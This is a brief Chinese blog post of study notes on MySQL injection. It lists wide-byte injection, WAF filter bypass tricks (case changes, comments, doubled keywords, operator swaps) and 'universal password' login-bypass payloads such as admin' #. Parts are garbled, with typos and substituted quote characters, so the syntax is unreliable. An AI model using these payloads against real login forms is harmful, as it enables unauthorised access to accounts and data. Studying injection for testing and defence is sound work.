sql注入知识---WAF绕过和其他小知识_sql万能密码绕过waf-CSDN博客

本文链接：https://blog.csdn.net/kui576/article/details/130230113

MYSQL注入WAF绕过和其他小知识

一，宽字节注入

两个字节是一个汉字用来处理加/的问题
’ -> ’ ->%5c%27
%df ’ -> %df ’ ->%df%5c%27
%df%5会被翻译成汉字就剩%27（'）

二，基于约束UNquit（突破长度限制）

admin
admin （无限个空格） 1

三，绕过

1.大小写变形，Or,OR,oR,OR，And，ANd，aND等代码中大小写不敏感都被剔除
2.在这两个敏感词汇中添加注释，例如：a//nd 双写绕过 oorr (没有写循环)
3.利用符号替代——and --&& or–||
4.内联注释与多行注释 /! 内联注释/ /多行注释/

=可以用like代替或regest，and用^代替，空格用()代替
\有注释的作用
+号ur编码后是空格
desc有2个参数可以传
过滤了注释用闭合 or ‘1’=’

四，万能密码:（逻辑通过问题不大）

**这个里面的''符号不能打我用了’代替了用的时候记得换**
1.select*from admin where username = ‘’ and password = ‘’

2.admin' #
 '+'     '+'
3.
否定和否定=肯定

```sql
username = ‘aaa’=‘ ’ and password = ‘bbb’ = ’‘

这个不理解的可以看看高数0.0![请添加图片描述](https://img-blog.csdnimg.cn/d0780a006e4d43d0b937bb658a03b50b.jpeg)
感谢大家观看，我会与大家共同进步的（qq:622816049）有问题可以提问。群主会帮助大家的。嘻嘻

## [终极扩展没有之一](https://blog.csdn.net/devil8123665/article/details/108746947)